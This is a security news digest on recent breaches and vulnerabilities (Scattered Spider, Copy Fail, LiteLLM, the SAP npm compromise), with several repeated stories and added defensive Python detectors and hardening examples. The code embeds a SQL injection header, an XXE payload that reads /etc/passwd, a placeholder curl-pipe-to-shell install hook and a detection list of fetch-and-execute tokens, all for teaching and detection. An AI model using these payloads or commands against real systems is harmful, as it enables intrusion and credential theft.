🔫 US charges Scattered Spider member arrested in Finland
A 19-year-old dual US-Estonian citizen using the alias "Bouquet" faces federal wire fraud and computer intrusion charges after Finnish authorities arrested him at Helsinki airport on April 10. According to Chicago Tribune reporting, temporarily unsealed court records link him to at least four Scattered Spider breaches, including attacks conducted when he was 16 years old.
The complaint details involvement in multi-million-dollar extortion campaigns against corporations, including a luxury retailer hit with an $8 million ransom demand in May 2025. The financially motivated collective, known for social engineering (often of IT help desks) and for MFA bombing, in which a user is flooded with push prompts until one is approved, has previously breached Caesars, MGM Resorts, and multiple UK retailers.
🛰️ Open sources - closed narratives
@sitreports
🤖 Kamasers Botnet Combines DDoS and Ransomware Delivery
A newly analyzed DDoS botnet named Kamasers combines multi-vector distributed denial-of-service capabilities with loader functions that can stage ransomware and data theft on infected hosts. Research by ANY.RUN shows the malware is distributed via the GCleaner and Amadey loaders, with control infrastructure hosted on an ASN belonging to Railnet LLC, previously linked to bulletproof hosting operations.
Kamasers uses a dead drop resolver: rather than embedding C2 addresses, it retrieves them at runtime from GitHub Gist, Telegram, and Dropbox, so static indicators in the binary are useless for blocking and the operators can rotate servers simply by editing a public post. Spanish-language commands observed in sessions point to Spanish-speaking operators, while targeting spans Germany, the U.S., Poland, and France across the education, telecom, and tech sectors.
🛰️ Open sources - closed narratives
@sitreports
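The dead-drop pattern above leaves a recognisable shape in egress logs: a fetch from a public paste/chat/file service followed shortly by a connection to a bare IP address that no DNS lookup preceded. The detector below is an added example, not ANY.RUN's code or anything from the Kamasers sample; the log format and the sample lines are constructed, and the dead-drop host list is a starting point drawn from the services named in the write-up, not an exhaustive catalogue.

```python
"""Flag clients whose traffic looks like a dead-drop resolver lookup followed by a C2 connection."""
import ipaddress
from datetime import datetime, timedelta

# Services named in the write-up as dead drops (plus their common front-ends). Assumed list.
DEAD_DROP_HOSTS = {
    "gist.githubusercontent.com", "gist.github.com",
    "api.telegram.org", "t.me",
    "dl.dropboxusercontent.com", "www.dropbox.com",
}
WINDOW = timedelta(seconds=120)   # how soon after the lookup the C2 connection must follow

# Constructed sample proxy log; hypothetical format: "<ISO8601> <client> CONNECT <dest>:<port>"
SAMPLE_LOG = """\
2026-04-28T10:00:01Z 10.0.0.5 CONNECT gist.githubusercontent.com:443
2026-04-28T10:00:04Z 10.0.0.5 CONNECT 203.0.113.7:6667
2026-04-28T10:00:10Z 10.0.0.9 CONNECT api.telegram.org:443
2026-04-28T10:09:00Z 10.0.0.9 CONNECT 198.51.100.20:443
2026-04-28T10:00:12Z 10.0.0.12 CONNECT www.dropbox.com:443
2026-04-28T10:00:13Z 10.0.0.12 CONNECT cdn.example.net:443
2026-04-28T10:00:20Z 10.0.0.15 CONNECT 198.51.100.5:8080
"""


def parse(line):
    """Split one log line into (timestamp, client, destination host, port)."""
    ts_s, client, _verb, dest = line.split()
    host, _, port = dest.rpartition(":")
    return datetime.strptime(ts_s, "%Y-%m-%dT%H:%M:%SZ"), client, host, int(port)


def is_ip_literal(host):
    """True when the destination was given as an IP address rather than a hostname."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def find_ddr_sequences(log_text, window=WINDOW):
    """Return {client: [(dead_drop_host, c2_ip, port), ...]} for clients whose dead-drop
    fetch is followed within `window` by a direct-to-IP connection."""
    events = sorted((parse(l) for l in log_text.splitlines() if l.strip()),
                    key=lambda e: (e[1], e[0]))          # group by client, then by time
    hits, last_drop = {}, {}                              # last_drop: client -> (ts, host)
    for ts, client, host, port in events:
        if host in DEAD_DROP_HOSTS:
            last_drop[client] = (ts, host)
            continue
        if is_ip_literal(host) and client in last_drop:
            drop_ts, drop_host = last_drop[client]
            if timedelta(0) <= ts - drop_ts <= window:
                hits.setdefault(client, []).append((drop_host, host, port))
    return hits


if __name__ == "__main__":
    for client, seqs in find_ddr_sequences(SAMPLE_LOG).items():
        for drop, ip, port in seqs:
            print(f"{client}: fetched {drop}, then connected to {ip}:{port}")
```

In the sample only 10.0.0.5 is flagged: 10.0.0.9 waited nine minutes, 10.0.0.12 went on to a hostname, and 10.0.0.15 never touched a dead drop. Legitimate software also resolves through Gist or Dropbox occasionally, so treat a hit as a lead to pivot on (process name, destination port, frequency) rather than a verdict.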
📄 Checkmarx Confirms LAPSUS$ Data Leak Following GitHub Breach
Application security firm Checkmarx has confirmed that LAPSUS$ threat actors leaked 96GB of data stolen from one of its private GitHub repositories. The breach originated from a March 23 compromise linked to the Trivy supply-chain attack, in which stolen credentials enabled unauthorized access. The attackers published malicious code and Docker images on April 22 before releasing the stolen data on both dark web and clearnet portals.
The incident shows how credentials stolen in one supply-chain compromise were reused to gain persistent access at downstream organizations. Checkmarx states no customer data was stored in the affected repository, though the forensic investigation continues. The company has restricted access to the repository pending completion of the probe.
🛰️ Open sources - closed narratives
@sitreports
🎭 Signal Phishing Campaign Targets German Political Elite
German prosecutors have opened an espionage investigation into a large-scale phishing operation targeting hundreds of Signal accounts belonging to politicians, ministers, military personnel, and journalists. Attackers posed as Signal support or as trusted contacts to trick victims into handing over authentication codes or scanning attacker-supplied QR codes, the mechanism Signal uses to link an additional device to an account, thereby gaining access to private communications. High-profile targets included CDU politician Julia Klöckner, and German authorities suspect Russian state involvement.
The campaign exploited human trust rather than a technical vulnerability: it did not break Signal's end-to-end encryption but took over the endpoint, where messages are readable by design.
🛰️ Open sources - closed narratives
@sitreports
🔫 Linux Kernel Flaw Enables 10-Line Root Exploit
A local privilege escalation vulnerability dubbed Copy Fail (CVE-2026-31431) allows unprivileged users to gain root on most Linux distributions released since 2017. The flaw in the kernel's authencesn cryptographic template lets an attacker write controlled bytes into the page cache of any file they can read, so a setuid binary can be altered in memory without its on-disk contents changing and without tripping filesystem integrity checks. A working exploit is 732 bytes of Python.
Major distributions including Debian, Ubuntu, and SUSE have shipped patches for the high-severity flaw, which Theori found with AI-assisted scanning. Although local access is required, the page cache is shared by every container on a node that maps the same file, so in Kubernetes a process in one container can alter a binary seen by other containers and by the host, turning the bug into a potential node escape.
🛰️ Open sources - closed narratives
@sitreports
🔫 SAP npm Packages Compromised in TeamPCP Supply Chain Attack
Four official SAP npm packages were compromised to deploy credential-stealing malware aimed at developers and CI/CD environments: @cap-js/sqlite, @cap-js/postgres, @cap-js/db-service, and mbt. According to security researchers, malicious preinstall scripts downloaded obfuscated payloads that harvested npm tokens, GitHub credentials, SSH keys, cloud provider credentials, and Kubernetes secrets, reading them from CI runner memory, and uploaded the encrypted loot to GitHub repositories titled "A Mini Shai-Hulud has Appeared."
Attribution to the TeamPCP threat actors is medium-confidence, based on tactics matching the earlier Bitwarden, Trivy, and Checkmarx compromises.
🛰️ Open sources - closed narratives
@sitreports
🔫 WordPress Plugin Harbored Five-Year Backdoor
Quick Page/Post Redirect, installed on over 70,000 WordPress sites, contained a hidden backdoor introduced in 2020-2021 releases that enabled remote code execution. Researcher Austin Ginder found it after infections triggered alerts across his hosting fleet: versions 5.2.1 and 5.2.2 carry a self-update mechanism pointing at an external domain, which pushed tampered builds to sites outside WordPress.org's review and distribution controls.
The backdoor drew no attention for years because its visible use was a parasite SEO operation that served spam only to logged-out visitors, so administrators browsing their own sites never saw it. Though the malicious C2 subdomain no longer resolves, the update hook persists on affected installations, and anyone who regains control of that domain could push arbitrary code to every site still running the backdoored versions.
🛰️ Open sources - closed narratives
@sitreports
📡 Oak Ridge Lab Develops Portable GPS Interference Detector
Oak Ridge National Laboratory unveiled a portable device capable of detecting GPS spoofing and jamming attacks on commercial vehicles. The system uses a software-defined radio and embedded GPU running novel RF analysis algorithms to distinguish authentic satellite signals from malicious ones, even when both are equal in strength. Testing with DHS showed the device outperforms existing commercial systems while operating independently of GPS infrastructure.
The technology addresses growing threats to logistics networks, including cargo theft operations that exploit spoofed location data to misdirect high-value shipments. Researchers are now working to reduce production costs for wider deployment across the trucking industry.
🛰️ Open sources - closed narratives
@sitreports
🔫 LiteLLM SQL Injection Exploited Within 36 Hours of Disclosure
A critical SQL injection vulnerability in LiteLLM (CVE-2026-42208) was exploited just 36 hours after public disclosure. The flaw, affecting versions 1.81.16 through 1.83.6, allows unauthenticated attackers to alter database queries through a crafted Authorization header, the header the proxy uses to look up the presented API key; successful exploitation could read or modify stored credentials and API keys. The vulnerability was patched in version 1.83.7 on April 19, 2026.
The Sysdig Threat Research Team observed targeted exploitation attempts demonstrating precise knowledge of LiteLLM's database schema. Unlike typical automated attacks, the intrusion showed deliberate enumeration, according to the researchers, though no evidence of data exfiltration or credential reuse was found.
🛰️ Open sources - closed narratives
@sitreports
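The bug class is worth seeing side by side. The snippet below is an added example, not LiteLLM's code: a hypothetical key table, a lookup that interpolates the bearer token into SQL, and the hardened lookup that validates the token's shape and binds it as a parameter. The attack header is constructed to show why the first one fails.

```python
"""Authorization-header SQL injection: vulnerable lookup beside the hardened one."""
import re
import sqlite3


def make_db():
    """Constructed stand-in for a key table; the schema is hypothetical, not LiteLLM's."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE api_keys (token TEXT PRIMARY KEY, owner TEXT, scopes TEXT)")
    conn.executemany("INSERT INTO api_keys VALUES (?, ?, ?)", [
        ("sk-alice-1111", "alice", "chat"),
        ("sk-admin-2222", "admin", "admin"),
    ])
    return conn


def bearer_token(headers):
    """Extract the token from 'Authorization: Bearer <token>' (empty string if absent)."""
    scheme, _, token = headers.get("Authorization", "").partition(" ")
    return token.strip() if scheme.lower() == "bearer" else ""


def lookup_vulnerable(conn, headers):
    """Header text becomes part of the SQL statement, so the client controls the WHERE clause."""
    token = bearer_token(headers)
    return conn.execute(
        f"SELECT owner, scopes FROM api_keys WHERE token = '{token}'").fetchall()


TOKEN_RE = re.compile(r"sk-[A-Za-z0-9_-]{4,128}")   # assumed key format for this example


def lookup_hardened(conn, headers):
    """Validate the token's shape, then bind it as a parameter so it can only ever be data."""
    token = bearer_token(headers)
    if not TOKEN_RE.fullmatch(token):
        return []
    return conn.execute(
        "SELECT owner, scopes FROM api_keys WHERE token = ?", (token,)).fetchall()


LEGIT = {"Authorization": "Bearer sk-alice-1111"}
ATTACK = {"Authorization": "Bearer ' OR '1'='1"}     # constructed injection payload

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, attacker header:", lookup_vulnerable(db, ATTACK))   # every key row
    print("hardened,   attacker header:", lookup_hardened(db, ATTACK))     # nothing
    print("hardened,   legitimate key: ", lookup_hardened(db, LEGIT))
```

The parameter binding alone closes the injection; the format check is there so that garbage never reaches the database at all and the log line for a rejected header is cheap. A proxy storing keys should additionally look up a hash of the token rather than the raw value, so that a read of the table is not an immediate credential leak.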
🤖 Pentagon to Establish Sub-Unified Command for Autonomous Warfare
Secretary of Defense Pete Hegseth announced the U.S. military will soon designate a sub-unified command focused on autonomous warfare, citing the central role of drones in modern combat. The move follows U.S. Southern Command's recent launch of its Autonomous Warfare Command. Hegseth emphasized lessons from Ukraine and Operation Epic Fury as drivers behind the decision.
The Pentagon's fiscal 2027 budget requests $54 billion for autonomous systems, including $39.2 billion for "Drone Dominance" initiatives. Sub-unified command status signals enduring priority, placing autonomous warfare alongside elite structures like Joint Special Operations Command.
🛰️ Open sources - closed narratives
@sitreports
🔫 Microsoft Incomplete Patch Spawns New Windows Zero-Day Under Active Exploitation
Microsoft's February fix for CVE-2026-21510, a Windows Shell flaw exploited by Russia's APT28 against Ukrainian and EU targets, closed the remote code execution path but not an authentication coercion vector in the same code. The residual issue, tracked as CVE-2026-32202, is now under active exploitation and has been added to CISA's Known Exploited Vulnerabilities catalog with a May 12 federal remediation deadline. The zero-click flaw makes Windows authenticate to an attacker-controlled server when it automatically parses a malicious LNK file, leaking Net-NTLMv2 challenge-responses (commonly called hashes) that can be cracked offline or relayed.
Akamai researchers found victim machines still authenticating to attacker servers after the original RCE fix was applied. Because no user interaction is needed, the vulnerability offers credential theft and lateral movement as a direct descendant of APT28's original exploit chain.
🛰️ Open sources - closed narratives
@sitreports
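Whatever the exact parsing bug, the coercion needs a shortcut that points at a remote UNC path, and that is something defenders can hunt for on shares and in mail attachments. The scanner below is an added example, not Akamai's or Microsoft's tooling: it recognises the LNK header, pulls UNC hostnames out of the file whether they are stored as ASCII or UTF-16, and reports any host outside an allow-list. The sample files are constructed byte blobs with a valid header and embedded paths, not real shortcuts.

```python
"""Hunt for .lnk files that reference remote UNC hosts, the trigger for NTLM coercion."""
import os
import re
import tempfile

# Shell link header: HeaderSize 0x4C followed by the LinkCLSID {00021401-0000-0000-C000-000000000046}.
LNK_MAGIC = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")

# \\host\ in 8-bit strings (LinkInfo) and in UTF-16LE strings (StringData / extra blocks).
UNC_ASCII = re.compile(rb"\\\\([A-Za-z0-9.\-]{1,253})\\")
UNC_UTF16 = re.compile(rb"(?:\\\x00){2}((?:[A-Za-z0-9.\-]\x00){1,253})\\\x00")


def is_lnk(data):
    return data[:20] == LNK_MAGIC


def remote_hosts(data):
    """Every UNC hostname found anywhere in the file, in either string encoding."""
    hosts = {m.group(1).decode("ascii", "replace") for m in UNC_ASCII.finditer(data)}
    hosts |= {m.group(1).decode("utf-16-le", "replace") for m in UNC_UTF16.finditer(data)}
    return hosts


def scan(paths, allowed_hosts=()):
    """Return [(path, {hosts})] for LNK files referencing hosts outside the allow-list."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for path in paths:
        try:
            with open(path, "rb") as f:
                data = f.read()
        except OSError:
            continue
        if not is_lnk(data):
            continue
        hosts = {h for h in remote_hosts(data) if h.lower() not in allowed}
        if hosts:
            findings.append((path, hosts))
    return findings


def build_samples():
    """Constructed LNK-like files: a 76-byte header plus embedded path strings, not real shortcuts."""
    d = tempfile.mkdtemp()
    header = LNK_MAGIC + b"\x00" * 56
    blobs = {
        "coercive.lnk": header + r"\\203.0.113.9\share\icon.ico".encode("utf-16-le"),
        "internal.lnk": header + rb"\\fileserver.corp.example\docs\q1.xlsx",
        "local.lnk":    header + rb"C:\Windows\System32\calc.exe",
        "notlnk.exe":   b"MZ" + b"\x00" * 80,
    }
    paths = {}
    for name, blob in blobs.items():
        paths[name] = os.path.join(d, name)
        with open(paths[name], "wb") as f:
            f.write(blob)
    return paths


if __name__ == "__main__":
    samples = build_samples()
    for path, hosts in scan(samples.values(), allowed_hosts=["fileserver.corp.example"]):
        print(f"{os.path.basename(path)} -> {sorted(hosts)}")
```

Run it over shares users browse and over extracted mail attachments; a shortcut whose icon or target lives on an internet IP has no business in a corporate directory. The byte scan is deliberately looser than a structural LNK parser so that it also catches paths hidden in extra data blocks. Pair the hunt with the usual coercion mitigation, blocking outbound SMB and WebDAV at the perimeter, since that stops the leak even where the parser bug is still unpatched.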
🔍 SAP npm Packages Compromised in Supply Chain Attack
Multiple SAP-related npm packages have been compromised with credential-stealing malware dubbed "Mini Shai-Hulud." The malicious code was injected into legitimate packages used by developers working with SAP systems, enabling attackers to exfiltrate authentication credentials from affected development environments.
The compromise targets the npm supply chain, a critical vector given SAP's widespread enterprise adoption. Organizations using affected packages face immediate exposure risk to credential theft, potentially granting attackers access to corporate SAP environments and sensitive business data.
🛰️ Open sources - closed narratives
@sitreports
🔍 NSA-Developed OT Tool Contains XML External Entity Vulnerability
CISA has issued an advisory for CVE-2026-6807, an XML External Entity (XXE) vulnerability affecting all versions of GrassMarlin, an NSA-developed passive network-mapping tool for critical infrastructure and SCADA networks that reached end-of-life in 2017. The flaw stems from an XML parser that is not hardened against external entity declarations in session files, so a maliciously crafted .gm3 session can make the tool read local files and send their contents out. According to reporting, exploitation requires tricking a user into opening a weaponized file, and a public PoC demonstrates base64-encoded exfiltration.
No patch is forthcoming because of the tool's EOL status; CISA recommends network isolation and access hardening. Since the only vector is a user opening an attacker-supplied session file, the immediate risk is lower for organizations that treat such files as untrusted and keep GrassMarlin hosts off networks that can reach the internet.
🛰️ Open sources - closed narratives
@sitreports
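With no patch coming, the practical control is to refuse any session file that declares entities before the tool ever parses it. The gate below is an added example and not GrassMarlin code: it assumes the session content is plain XML text (if .gm3 is an archive, apply it to each XML member after extraction) and rejects DOCTYPE and ENTITY declarations twice, once with a cheap text check and once inside the expat parser so that an external reference can never be resolved. The malicious document is a constructed XXE payload of the usual shape, not the published PoC.

```python
"""Reject DOCTYPE/entity declarations before handing an XML session file to a parser."""
import re
import xml.parsers.expat

# Constructed: an external-entity declaration pointing at a local file, then a reference to it.
MALICIOUS = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE session [<!ENTITY ext SYSTEM "file:///etc/passwd">]>'
    '<session><name>&ext;</name></session>'
)
BENIGN = '<?xml version="1.0"?><session><name>lab-net</name></session>'


class UnsafeXML(ValueError):
    """Raised for any document that tries to declare or reference entities."""


def reject_doctype(text):
    """Cheap pre-parse gate: a DOCTYPE or ENTITY declaration anywhere is refused outright."""
    if re.search(r"<!(DOCTYPE|ENTITY)\b", text, re.IGNORECASE):
        raise UnsafeXML("DOCTYPE/ENTITY declarations are not permitted in session files")


def parse_hardened(text, pre_gate=True):
    """Parse with expat using handlers that abort on a DOCTYPE or an external entity reference,
    so entity expansion never starts. Returns the element names in document order."""
    if pre_gate:
        reject_doctype(text)
    tags = []
    p = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"unexpected DOCTYPE {name!r}")

    def on_external_ref(context, base, system_id, public_id):
        raise UnsafeXML(f"external entity reference to {system_id!r}")

    p.StartDoctypeDeclHandler = on_doctype          # fires before any entity in the subset
    p.ExternalEntityRefHandler = on_external_ref    # belt and braces: never fetch anything
    p.StartElementHandler = lambda name, attrs: tags.append(name)
    p.Parse(text, True)
    return tags


def is_safe(text, pre_gate=True):
    """Convenience wrapper: True if the document parses without touching entities."""
    try:
        parse_hardened(text, pre_gate)
        return True
    except UnsafeXML:
        return False


if __name__ == "__main__":
    print("benign   :", is_safe(BENIGN), parse_hardened(BENIGN))
    print("malicious:", is_safe(MALICIOUS))
```

The text gate is what you would put in front of an end-of-life tool you cannot modify: wrap the file-open path in a script that runs it and refuses the file on a hit. The expat handler shows what the fix inside the tool would look like if one could be made, and it is the same shape in Java's SAX or DOM parsers, where disallowing DOCTYPE declarations is a one-line feature flag.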
🤖 DPRK Actors Deploy AI-Generated npm Packages in Developer Supply Chain Campaign
North Korean threat actors are distributing malware through npm packages containing AI-generated code, alongside fake recruitment firms that target software developers. The campaign delivers remote access trojans through social engineering built around job offers.
The operation shows the continued evolution of DPRK supply-chain targeting, pairing automated code generation with the groups' established recruitment-themed social engineering. Developer-focused attacks remain a priority for the revenue-generation operations attributed to Pyongyang-affiliated groups.
🛰️ Open sources - closed narratives
@sitreports
🔍 DHS Expanding Predator Drone Fleet for Domestic Surveillance
Customs and Border Protection plans to spend hundreds of millions of dollars on additional high-powered surveillance drones, with other DHS components potentially launching their own MQ-9 fleets, according to procurement records reviewed by 404 Media.
The expansion signals broader integration of military-grade aerial surveillance capabilities across DHS operations beyond traditional border monitoring, potentially establishing parallel drone infrastructure within multiple agency branches.
🛰️ Open sources - closed narratives
@sitreports
🤖 LinkedIn AI Hiring Agents Project $450M Annual Revenue
Microsoft-owned LinkedIn announced its agentic AI hiring products are projected to generate $450 million in sales over the next year, according to company statements. The platform's AI agents automate recruitment workflows for corporate clients.
The revenue projection signals rapid enterprise adoption of autonomous AI systems in talent acquisition, positioning LinkedIn to capture significant market share in HR automation. Microsoft's integration strategy appears focused on high-margin B2B services rather than consumer-facing AI products.
🛰️ Open sources - closed narratives
@sitreports
📡 House Speaker Leverages Crypto Provisions to Secure FISA Reauthorization Votes
Speaker Mike Johnson secured Freedom Caucus support for FISA Section 702 renewal by incorporating cryptocurrency-friendly language into the surveillance legislation package, according to reporting by The Intercept. The tactical bundling paired expanded domestic surveillance authorities with reduced regulatory oversight on digital assets.
The legislative strategy faces Senate obstacles where crypto provisions are unlikely to survive committee review, potentially forcing a clean FISA vote. This marks a notable shift in coalition-building tactics where domestic surveillance expansion now requires incentive structures beyond traditional security framing.
🛰️ Open sources - closed narratives
@sitreports
🔫 Copy Fail: Linux kernel LPE enables root via 10-line Python script
CVE-2026-31431, dubbed Copy Fail, exploits a flaw in the Linux kernel's authencesn cryptographic template that lets an unprivileged user write four controlled bytes into the page cache of any readable file. A 732-byte Python exploit uses this to patch setuid binaries in memory and gain root on nearly all distributions since 2017. Theori researchers found the vulnerability with AI-assisted scanning, and major distributions have issued patches for the flaw, which carries a CVSS score of 7.8.
Like Dirty Pipe, and unlike Dirty Cow, the exploit is deterministic and needs no race to win. Primary risk vectors are multi-tenant systems, shared-kernel containers, and CI/CD pipelines that execute untrusted code. Because containers on a node share the kernel's page cache, a modified file is seen modified by every container that maps it, giving an attacker a potential Kubernetes node escape rather than just a local privilege escalation.
🛰️ Open sources - closed narratives
@sitreports
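The detail that matters for responders in both Copy Fail posts above is that the tampering lives in the page cache, not on disk, so hashing the file through a normal read returns the attacker's bytes while package-manager verification of the disk blocks may still pass. The check below is an added example, not Theori's code or any distribution's tooling: it hashes a file once, asks the kernel to evict the file's cached pages, and hashes it again so the second read has to come from disk. It assumes, as with Dirty Pipe, that bytes injected into the cache are never marked dirty and so are discarded rather than written back; the self-test uses a constructed file that should of course match.

```python
"""Compare a file as served from the page cache with what is actually on disk."""
import hashlib
import os
import tempfile


def _sha256_fd(fd):
    """Hash the whole file via ordinary reads, i.e. through the page cache."""
    h = hashlib.sha256()
    os.lseek(fd, 0, os.SEEK_SET)
    while chunk := os.read(fd, 1 << 20):
        h.update(chunk)
    return h.hexdigest()


def page_cache_matches_disk(path):
    """Return (cached_digest, disk_digest, match). Evicting the file's clean pages needs no
    privilege; assumption: injected page-cache bytes are not dirty, so eviction drops them."""
    fd = os.open(path, os.O_RDONLY)
    try:
        cached = _sha256_fd(fd)
        if hasattr(os, "posix_fadvise"):          # Linux; silently a no-op elsewhere
            os.posix_fadvise(fd, 0, 0, os.POSIX_FADV_DONTNEED)
        disk = _sha256_fd(fd)
    finally:
        os.close(fd)
    return cached, disk, cached == disk


def audit_setuid_binaries(dirs=("/usr/bin", "/usr/sbin", "/bin", "/sbin")):
    """Paths of setuid/setgid binaries whose cached and on-disk contents differ."""
    suspects, seen = [], set()
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in os.listdir(d):
            p = os.path.realpath(os.path.join(d, name))
            if p in seen or not os.path.isfile(p):
                continue
            seen.add(p)
            if os.stat(p).st_mode & (0o4000 | 0o2000):
                try:
                    _, _, ok = page_cache_matches_disk(p)
                except OSError:                   # unreadable: cannot be a Copy Fail target
                    continue
                if not ok:
                    suspects.append(p)
    return suspects


def self_test():
    """Constructed, unmodified file: the two digests must agree."""
    with tempfile.NamedTemporaryFile(delete=False) as f:
        f.write(b"#!/bin/sh\necho unchanged\n" * 100)
        path = f.name
    try:
        return page_cache_matches_disk(path)[2]
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print("self-test ok:", self_test())
    print("suspects:", audit_setuid_binaries())
```

Two caveats. POSIX_FADV_DONTNEED only evicts pages that nothing has mapped, so a binary that is currently executing keeps its tampered text pages and will not be caught; running `echo 3 > /proc/sys/vm/drop_caches` as root before the second hash, or checking from the host rather than inside the container, is stronger. And a matching pair of digests only says the cache is clean now; the real fix is the kernel update.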
🔫 SAP npm Packages Compromised in TeamPCP Supply Chain Attack
Four official SAP npm packages were compromised to deploy credential-stealing malware aimed at developers and CI/CD pipelines. The affected packages, @cap-js/sqlite, @cap-js/postgres, @cap-js/db-service, and mbt, carried malicious preinstall scripts that extracted npm tokens, SSH keys, cloud credentials, and CI/CD secrets. According to security researchers, the malware read the CI runner's process memory to recover secrets that log masking would otherwise hide, and it self-propagated by using the stolen npm credentials to inject its code into other packages the victim was able to publish.
Attribution to the TeamPCP threat actors is medium-confidence; the group previously compromised Bitwarden and Checkmarx packages using similar tactics.
🛰️ Open sources - closed narratives
@sitreports
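All three SAP npm posts above turn on the same mechanism: a lifecycle script that runs at install time with the developer's or the CI runner's credentials in reach. The audit below is an added example, not SAP's tooling or the researchers' IOC script: it walks an installed node_modules tree, lists every package that declares a preinstall/install/postinstall/prepare hook, marks hooks that look like a remote fetch-and-execute, and flags the package names from the reporting (by name only, since affected versions are not given here). The node_modules tree it builds for the demo is constructed, and its "malicious" script is a placeholder, not the real payload.

```python
"""Audit an installed node_modules tree for packages that run scripts at install time."""
import json
import os
import tempfile

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Names from the reporting; a hit is a prompt to check the installed version, not proof.
WATCH_LIST = {"@cap-js/sqlite", "@cap-js/postgres", "@cap-js/db-service", "mbt"}

# Heuristics for "download something and run it" inside a hook command.
SUSPICIOUS_TOKENS = ("curl ", "wget ", "http://", "https://", "| sh", "| bash", "eval(", "base64")


def iter_package_manifests(node_modules):
    """Yield package.json paths for top-level and nested packages, scoped ones included."""
    for root, _dirs, files in os.walk(node_modules):
        if "package.json" not in files:
            continue
        parent = os.path.dirname(root)
        scoped = os.path.basename(parent).startswith("@")
        owner = os.path.dirname(parent) if scoped else parent
        if os.path.basename(owner) == "node_modules":
            yield os.path.join(root, "package.json")


def audit(node_modules):
    """Return findings sorted with high-priority ones first."""
    findings = []
    for manifest in iter_package_manifests(node_modules):
        try:
            with open(manifest, encoding="utf-8") as f:
                pkg = json.load(f)
        except (OSError, ValueError):
            continue
        name, version = pkg.get("name", "?"), pkg.get("version", "?")
        scripts = pkg.get("scripts") or {}
        hooks = {h: scripts[h] for h in LIFECYCLE_HOOKS if h in scripts}
        if not hooks and name not in WATCH_LIST:
            continue
        reasons = ["on watch list"] if name in WATCH_LIST else []
        remote = False
        for hook, cmd in hooks.items():
            if any(tok in cmd for tok in SUSPICIOUS_TOKENS):
                remote = True
                reasons.append(f"{hook}: {cmd!r} [remote fetch/exec]")
            else:
                reasons.append(f"{hook}: {cmd!r}")
        findings.append({"name": name, "version": version, "path": manifest,
                         "reasons": reasons, "high": remote or name in WATCH_LIST})
    return sorted(findings, key=lambda f: (not f["high"], f["name"]))


def build_sample_tree():
    """Constructed node_modules for the demo; the preinstall command is a placeholder."""
    nm = os.path.join(tempfile.mkdtemp(), "node_modules")
    samples = {
        "@cap-js/sqlite": {"name": "@cap-js/sqlite", "version": "0.0.0",
                           "scripts": {"preinstall": "curl -s https://example.invalid/p | sh"}},
        "harmless": {"name": "harmless", "version": "1.0.0"},
        "native-addon": {"name": "native-addon", "version": "2.1.0",
                         "scripts": {"install": "node-gyp rebuild"}},
    }
    for name, manifest in samples.items():
        d = os.path.join(nm, *name.split("/"))
        os.makedirs(d)
        with open(os.path.join(d, "package.json"), "w", encoding="utf-8") as f:
            json.dump(manifest, f)
    return nm


if __name__ == "__main__":
    for f in audit(build_sample_tree()):
        print("HIGH" if f["high"] else "info", f["name"], f["version"], "|", "; ".join(f["reasons"]))
```

The audit is retrospective; the preventive control is `npm ci --ignore-scripts` in CI, with the handful of packages that genuinely need a native build (the `node-gyp rebuild` case above) rebuilt in an explicit, allow-listed step. Either way, anything the runner could reach at install time, npm tokens, cloud credentials, SSH keys, has to be treated as exposed once a flagged package is confirmed malicious, not merely rotated if convenient.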
🔫 WordPress Plugin Harbored Five-Year Backdoor
The Quick Page/Post Redirect plugin, active on over 70,000 WordPress sites, has contained a hidden backdoor since 2020 that enabled remote code execution via external update servers. Versions 5.2.1 and 5.2.2 include a self-update mechanism pointing at the third-party domain 'anadnet.com', which pushed tampered builds outside WordPress.org's oversight. The backdoor delivered SEO spam to logged-out visitors while keeping persistent update hooks to attacker infrastructure, according to security researcher Austin Ginder.
WordPress.org has suspended the plugin pending review, which halts distribution through the official directory but leaves the 70,000 existing installs with update checks still pointing at attacker infrastructure; the command-and-control subdomain no longer resolves, so the hook is dormant rather than removed.
🛰️ Open sources - closed narratives
@sitreports
📡 ORNL develops portable GPS spoofing detector with equal-strength detection capability
Oak Ridge National Laboratory researchers led by Austin Albright have developed a portable GPS interference detection system capable of identifying both jamming and spoofing attacks. The device uses a software-defined radio and embedded GPU running novel RF analysis algorithms. Critically, according to reporting, the system can detect spoofing even when fake and real signals are equally strong—a capability no known detector currently possesses.
With successful DHS testing for commercial trucking complete, the team is pursuing cost reduction to enable broader deployment across logistics and critical cargo transport sectors where GPS manipulation poses growing operational risks.
🛰️ Open sources - closed narratives
@sitreports